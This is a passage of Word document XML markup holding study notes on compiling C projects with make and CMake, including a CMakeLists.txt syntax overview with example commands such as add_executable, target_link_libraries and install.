        </w:rPr>
        <w:t>cmake ..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573FFD4F" w14:textId="77777777" w:rsidR="00C55875" w:rsidRPr="00FC3414" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC3414">
        <w:t>Run make to compile the project:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1E0589" w14:textId="77777777" w:rsidR="00C55875" w:rsidRPr="00FC3414" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC3414">
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>make</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C748DE" w14:textId="77777777" w:rsidR="00C55875" w:rsidRPr="00FC3414" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC3414">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4315EF" w14:textId="77777777" w:rsidR="00C55875" w:rsidRPr="00FC3414" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC3414">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Makefile</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC3414">
        <w:t>: Directly use make to compile the project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAD4EE3" w14:textId="77777777" w:rsidR="00C55875" w:rsidRPr="00FC3414" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC3414">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CMakeLists.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC3414">
        <w:t>: Use cmake to generate the build scripts, then use make to compile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B824DF" w14:textId="77777777" w:rsidR="00C55875" w:rsidRPr="00FC3414" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC3414">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>./src Directory</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC3414">
        <w:t xml:space="preserve">: Contains the actual source code, but you usually don't need to interact </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC3414">
        <w:lastRenderedPageBreak/>
        <w:t>with it directly when using make or cmake.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6B40A6" w14:textId="77777777" w:rsidR="00C55875" w:rsidRPr="00FC3414" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC3414">
        <w:t>By following the instructions relevant to the build system your project uses, you can compile the entire C project efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769BFEA3" w14:textId="77777777" w:rsidR="00C55875" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5984A75A" w14:textId="77777777" w:rsidR="00C55875" w:rsidRDefault="00C55875" w:rsidP="00C55875">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51151683" w14:textId="7B49C10D" w:rsidR="00C55875" w:rsidRDefault="00D876D5" w:rsidP="00D876D5">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>akeLists.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE94A3B" w14:textId="77777777" w:rsidR="00D876D5" w:rsidRDefault="00D876D5" w:rsidP="00D876D5"/>
    <w:p w14:paraId="749D87A6" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:r w:rsidRPr="00EC3C14">
        <w:t>CMakeLists.txt is the configuration file used by CMake, a cross-platform build system generator. This file defines the build process for your project, including specifying the source files, required libraries, compiler options, and other configuration details.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A69E656" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC3C14">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Basic Syntax and Structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB654F9" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC3C14">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commands</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC3C14">
        <w:t>: CMake commands are case-insensitive (e.g., cmake_minimum_required, project, add_executable). However, the convention is to write them in lowercase.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE6A53C" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC3C14">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Arguments</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC3C14">
        <w:t>: Commands take arguments, which can be strings, variables, paths, or lists. Arguments are separated by spaces.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075D9AEF" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC3C14">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Variables</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC3C14">
        <w:t>: Variables are defined using set() and accessed using ${}. For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0D75C7" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:r w:rsidRPr="00EC3C14">
        <w:t>cmake</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786C1A8C" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:r w:rsidRPr="00EC3C14">
        <w:t>Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66436318" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:r w:rsidRPr="00EC3C14">
        <w:t>set(SOURCES main.cpp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423D81D6" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:r w:rsidRPr="00EC3C14">
        <w:t>You can then use ${SOURCES} elsewhere in the script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAABAB8" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC3C14">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lists</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC3C14">
        <w:t>: CMake supports list variables, which can be created by separating values with a semicolon:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCA05BA" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:r w:rsidRPr="00EC3C14">
        <w:t>cmake</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4A8516" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:r w:rsidRPr="00EC3C14">
        <w:t>Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE09900" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:r w:rsidRPr="00EC3C14">
        <w:t>set(SOURCES main.cpp;helper.cpp;utils.cpp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795A6026" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC3C14">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Comments</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC3C14">
        <w:t>: Comments are denoted by the # symbol. Everything after the # on that line is a comment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B279921" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC3C14">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Common Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592A3C43" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC3C14">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cmake_minimum_required</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC3C14">
        <w:t>: Specifies the minimum required CMake version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4456B5CC" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:r w:rsidRPr="00EC3C14">
        <w:t>cmake</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D893CAF" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:r w:rsidRPr="00EC3C14">
        <w:t>Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E9DCCB" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:r w:rsidRPr="00EC3C14">
        <w:t>cmake_minimum_required(VERSION 3.10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC81BB5" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC3C14">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>project</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC3C14">
        <w:t>: Defines the project name and optionally the programming languages used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DBBEEE" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:r w:rsidRPr="00EC3C14">
        <w:t>cmake</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E387192" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:r w:rsidRPr="00EC3C14">
        <w:t>Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0669E853" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:r w:rsidRPr="00EC3C14">
        <w:t>project(MyProject LANGUAGES CXX)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28027C6A" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC3C14">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>add_executable</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC3C14">
        <w:t>: Defines an executable target from source files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026BB432" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:r w:rsidRPr="00EC3C14">
        <w:t>cmake</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EC92CA" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:r w:rsidRPr="00EC3C14">
        <w:t>Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C84B2B" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:r w:rsidRPr="00EC3C14">
        <w:t>add_executable(MyExecutable main.cpp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF87DDF" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC3C14">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>add_library</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC3C14">
        <w:t>: Defines a library target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1401B845" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:r w:rsidRPr="00EC3C14">
        <w:t>cmake</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2106E40B" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:r w:rsidRPr="00EC3C14">
        <w:lastRenderedPageBreak/>
        <w:t>Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20673D95" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:r w:rsidRPr="00EC3C14">
        <w:t>add_library(MyLibrary STATIC mylib.cpp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B250D3" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC3C14">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>target_link_libraries</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC3C14">
        <w:t>: Links a target (executable or library) to specified libraries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD3845E" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:r w:rsidRPr="00EC3C14">
        <w:t>cmake</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8A028E" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:r w:rsidRPr="00EC3C14">
        <w:t>Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C90FDD1" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:r w:rsidRPr="00EC3C14">
        <w:t>target_link_libraries(MyExecutable PRIVATE MyLibrary)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11661B10" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC3C14">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>include_directories</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC3C14">
        <w:t>: Specifies directories to search for header files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1528EA17" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:r w:rsidRPr="00EC3C14">
        <w:t>cmake</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA92D73" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:r w:rsidRPr="00EC3C14">
        <w:t>Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E417E5A" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:r w:rsidRPr="00EC3C14">
        <w:t>include_directories(${CMAKE_SOURCE_DIR}/include)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719919E9" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC3C14">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>find_package</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC3C14">
        <w:t>: Searches for installed packages, such as libraries, and sets up variables for them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1983E9F8" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:r w:rsidRPr="00EC3C14">
        <w:t>cmake</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B39F57" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:r w:rsidRPr="00EC3C14">
        <w:t>Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F4BB0D" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:r w:rsidRPr="00EC3C14">
        <w:t>find_package(Boost REQUIRED COMPONENTS system)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB8B1AC" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC3C14">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>install</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC3C14">
        <w:t>: Specifies installation rules for targets and files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4484E60E" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:r w:rsidRPr="00EC3C14">
        <w:t>cmake</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397A875F" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:r w:rsidRPr="00EC3C14">
        <w:t>Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA80AA6" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:r w:rsidRPr="00EC3C14">
        <w:t>install(TARGETS MyExecutable DESTINATION bin)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AD528E" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC3C14">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example CMakeLists.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2544D9AB" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:r w:rsidRPr="00EC3C14">
        <w:t>cmake</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5F44EB" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:r w:rsidRPr="00EC3C14">
        <w:t>Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE3D65F" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:r w:rsidRPr="00EC3C14">
        <w:t>cmake_minimum_required(VERSION 3.10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A3BCAD" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:r w:rsidRPr="00EC3C14">
        <w:t>project(MyProject LANGUAGES CXX)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0189FB3D" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14"/>
    <w:p w14:paraId="25780417" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:r w:rsidRPr="00EC3C14">
        <w:t>set(SOURCES main.cpp helper.cpp utils.cpp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0841BCC9" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14"/>
    <w:p w14:paraId="5CF42EB7" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:r w:rsidRPr="00EC3C14">
        <w:t>add_executable(MyExecutable ${SOURCES})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB113D0" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14"/>
    <w:p w14:paraId="0A51CEF5" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:r w:rsidRPr="00EC3C14">
        <w:t>target_link_libraries(MyExecutable PRIVATE MyLibrary)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7D4FE9" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14"/>
    <w:p w14:paraId="056FA5B8" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:r w:rsidRPr="00EC3C14">
        <w:t>install(TARGETS MyExecutable DESTINATION bin)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273531ED" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC3C14">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Additional Concepts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC91FC6" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC3C14">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Conditional Statements</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC3C14">
        <w:t>: You can use if, else, elseif, and endif to conditionally include commands based on variables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D4BE21" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:r w:rsidRPr="00EC3C14">
        <w:t>cmake</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308ED19B" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:r w:rsidRPr="00EC3C14">
        <w:t>Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720BE413" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:r w:rsidRPr="00EC3C14">
        <w:t>if(CMAKE_BUILD_TYPE STREQUAL "Debug")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3992A8" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:r w:rsidRPr="00EC3C14">
        <w:t xml:space="preserve">    message("Debug build")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BC0449" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
